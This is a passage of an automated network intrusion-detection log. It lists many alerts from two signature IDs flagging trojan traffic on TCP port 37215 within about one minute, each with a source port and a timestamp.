                  SID:2835222
                  Source Port:48730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.355278
                  SID:2835222
                  Source Port:47484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.605260
                  SID:2835222
                  Source Port:49494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.905348
                  SID:2829579
                  Source Port:40760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.440849
                  SID:2829579
                  Source Port:42266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.378984
                  SID:2829579
                  Source Port:37154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.630822
                  SID:2829579
                  Source Port:35886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290741
                  SID:2835222
                  Source Port:44900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.088837
                  SID:2829579
                  Source Port:41110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.788694
                  SID:2835222
                  Source Port:51756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.118425
                  SID:2835222
                  Source Port:51500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.165802
                  SID:2835222
                  Source Port:43462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.657439
                  SID:2829579
                  Source Port:49172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.972385
                  SID:2835222
                  Source Port:59602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.571103
                  SID:2835222
                  Source Port:37846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.646644
                  SID:2829579
                  Source Port:49566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.117995
                  SID:2829579
                  Source Port:60998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.659815
                  SID:2835222
                  Source Port:34774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.663185
                  SID:2835222
                  Source Port:60982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.949635
                  SID:2835222
                  Source Port:42376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.597902
                  SID:2835222
                  Source Port:42702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.700547
                  SID:2829579
                  Source Port:41410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.320744
                  SID:2829579
                  Source Port:41292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.423128
                  SID:2835222
                  Source Port:42696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.866031
                  SID:2829579
                  Source Port:50376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.830274
                  SID:2829579
                  Source Port:59010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.864759
                  SID:2829579
                  Source Port:37412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.116364
                  SID:2835222
                  Source Port:35990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.896210
                  SID:2829579
                  Source Port:44728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.055753
                  SID:2829579
                  Source Port:51300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.916413
                  SID:2835222
                  Source Port:46620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.379647
                  SID:2829579
                  Source Port:54122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.221406
                  SID:2835222
                  Source Port:54882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.021815
                  SID:2829579
                  Source Port:51368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.879483
                  SID:2829579
                  Source Port:54418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.583346
                  SID:2835222
                  Source Port:51952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.518117
                  SID:2835222
                  Source Port:50096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.944748
                  SID:2829579
                  Source Port:58702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.847000
                  SID:2829579
                  Source Port:40646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.605681
                  SID:2835222
                  Source Port:50880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.863789
                  SID:2835222
                  Source Port:41774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.974758
                  SID:2835222
                  Source Port:36020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.826796
                  SID:2829579
                  Source Port:50576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.432094
                  SID:2829579
                  Source Port:51316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.022999
                  SID:2835222
                  Source Port:54814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.840922
                  SID:2829579
                  Source Port:43968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.949635
                  SID:2835222
                  Source Port:49462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.163403
                  SID:2835222
                  Source Port:42220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.964289
                  SID:2829579
                  Source Port:44032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.942646
                  SID:2829579
                  Source Port:39674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.886880
                  SID:2835222
                  Source Port:52270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.407973
                  SID:2835222
                  Source Port:34384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.207018
                  SID:2829579
                  Source Port:43926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.890192
                  SID:2829579
                  Source Port:37226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.352654
                  SID:2835222
                  Source Port:54944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.560013
                  SID:2829579
                  Source Port:54124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.822211
                  SID:2829579
                  Source Port:55178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.340651
                  SID:2835222
                  Source Port:39564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.440883
                  SID:2835222
                  Source Port:49910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.532226
                  SID:2829579
                  Source Port:53430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814574
                  SID:2829579
                  Source Port:37984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.172380
                  SID:2835222
                  Source Port:57548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.055753
                  SID:2829579
                  Source Port:36084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.392064
                  SID:2829579
                  Source Port:58346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.429155
                  SID:2835222
                  Source Port:41806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.545208
                  SID:2835222
                  Source Port:37096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.210763
                  SID:2829579
                  Source Port:57624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.351608
                  SID:2835222
                  Source Port:48410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.619683
                  SID:2835222
                  Source Port:53450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.610191
                  SID:2829579
                  Source Port:35234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.133869
                  SID:2835222
                  Source Port:56736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.052711
                  SID:2835222
                  Source Port:39508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.603262
                  SID:2835222
                  Source Port:59442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.881781
                  SID:2829579
                  Source Port:42934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.334361
                  SID:2835222
                  Source Port:46410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.215943
                  SID:2829579
                  Source Port:48074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.585966
                  SID:2835222
                  Source Port:60262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.716778
                  SID:2835222
                  Source Port:47222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.963816
                  SID:2835222
                  Source Port:41358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.006056
                  SID:2835222
                  Source Port:46194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.909366
                  SID:2835222
                  Source Port:42878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.915604
                  SID:2835222
                  Source Port:50700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.271475
                  SID:2835222
                  Source Port:46152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.269979
                  SID:2835222
                  Source Port:48632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.134313
                  SID:2835222
                  Source Port:54362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.224189
                  SID:2835222
                  Source Port:36040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.285885
                  SID:2829579
                  Source Port:35884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.968110
                  SID:2835222
                  Source Port:60702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.318227
                  SID:2829579
                  Source Port:40482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.070313
                  SID:2829579
                  Source Port:37406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.340754
                  SID:2835222
                  Source Port:45664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.189042
                  SID:2829579
                  Source Port:55674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:21.440829
                  SID:2835222
                  Source Port:55796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.733003
                  SID:2829579
                  Source Port:39372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.761249
                  SID:2835222
                  Source Port:33302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:44.495455
                  SID:2829579
                  Source Port:39946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.666062
                  SID:2829579
                  Source Port:46630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.419157
                  SID:2835222
                  Source Port:47962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.966709
                  SID:2829579
                  Source Port:44734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.656614
                  SID:2829579
                  Source Port:38222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.648004
                  SID:2835222
                  Source Port:56064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.356000
                  SID:2829579
                  Source Port:57118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.170794
                  SID:2835222
                  Source Port:51706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.540241
                  SID:2835222
                  Source Port:53618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.144364
                  SID:2835222
                  Source Port:44474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.920658
                  SID:2829579
                  Source Port:43520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.076000
                  SID:2829579
                  Source Port:32770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.342760
                  SID:2835222
                  Source Port:39662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.765142
                  SID:2835222
                  Source Port:33808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.077257
                  SID:2835222
                  Source Port:53442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.190243
                  SID:2829579
                  Source Port:52712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.366106
                  SID:2835222
                  Source Port:46542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.308441
                  SID:2829579
                  Source Port:34018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.095696
                  SID:2829579
                  Source Port:44068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.036336
                  SID:2835222
                  Source Port:58224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.925004
                  SID:2835222
                  Source Port:47358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.553055
                  SID:2829579
                  Source Port:42694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469526
                  SID:2829579
                  Source Port:59488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.773656
                  SID:2829579
                  Source Port:53928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.146612
                  SID:2829579
                  Source Port:58568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.236089
                  SID:2835222
                  Source Port:51154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.063693
                  SID:2829579
                  Source Port:44604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.779688
                  SID:2835222
                  Source Port:52576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.880564
                  SID:2829579
                  Source Port:56264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.878182
                  SID:2829579
                  Source Port:42536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.553944
                  SID:2829579
                  Source Port:46410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.976557
                  SID:2835222
                  Source Port:42132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.610357
                  SID:2829579
                  Source Port:35328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.780678
                  SID:2829579
                  Source Port:42934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.208199
                  SID:2835222
                  Source Port:35294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.856621
                  SID:2829579
                  Source Port:40014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.019730
                  SID:2835222
                  Source Port:43446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.672163
                  SID:2829579
                  Source Port:56682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.481164
                  SID:2835222
                  Source Port:51622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.084652
                  SID:2829579
                  Source Port:47852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778927
                  SID:2835222
                  Source Port:51464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.343381
                  SID:2835222
                  Source Port:58312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.162511
                  SID:2829579
                  Source Port:57468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.568589
                  SID:2829579
                  Source Port:50674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571797
                  SID:2835222
                  Source Port:53894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.540964
                  SID:2829579
                  Source Port:57248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.655390
                  SID:2835222
                  Source Port:47416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.739922
                  SID:2829579
                  Source Port:36410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.808876
                  SID:2835222
                  Source Port:42340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.259693
                  SID:2835222
                  Source Port:55010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.991583
                  SID:2835222
                  Source Port:45318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.790586
                  SID:2835222
                  Source Port:54356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.437142
                  SID:2835222
                  Source Port:39998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.172014
                  SID:2829579
                  Source Port:32794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.178125
                  SID:2829579
                  Source Port:46894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.525834
                  SID:2835222
                  Source Port:38438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.192444
                  SID:2829579
                  Source Port:40410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.958790
                  SID:2835222
                  Source Port:54166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.538711
                  SID:2835222
                  Source Port:54314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.216588
                  SID:2829579
                  Source Port:38038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.165242
                  SID:2829579
                  Source Port:39708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.349677
                  SID:2835222
                  Source Port:40800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.840251
                  SID:2829579
                  Source Port:54330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650835
                  SID:2829579
                  Source Port:35566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.822671
                  SID:2829579
                  Source Port:56804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.138441
                  SID:2829579
                  Source Port:60758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.507849
                  SID:2835222
                  Source Port:60098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.004122
                  SID:2829579
                  Source Port:35466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.189899
                  SID:2835222
                  Source Port:41884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.856517
                  SID:2835222
                  Source Port:53986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.053274
                  SID:2835222
                  Source Port:53002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.552344
                  SID:2835222
                  Source Port:54558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.912499
                  SID:2835222
                  Source Port:52654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623309
                  SID:2835222
                  Source Port:46358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.962913
                  SID:2829579
                  Source Port:41686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.148385
                  SID:2835222
                  Source Port:40644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.996170
                  SID:2829579
                  Source Port:34324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.481143
                  SID:2835222
                  Source Port:41720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.613103
                  SID:2829579
                  Source Port:53726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.815907
                  SID:2829579
                  Source Port:60388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.322018
                  SID:2829579
                  Source Port:35436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.520394
                  SID:2829579
                  Source Port:44502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.361562
                  SID:2829579
                  Source Port:41146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.956633
                  SID:2835222
                  Source Port:55768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.501498
                  SID:2835222
                  Source Port:47536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.861414
                  SID:2829579
                  Source Port:50166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.926314
                  SID:2835222
                  Source Port:40766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.526771
                  SID:2829579
                  Source Port:48446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
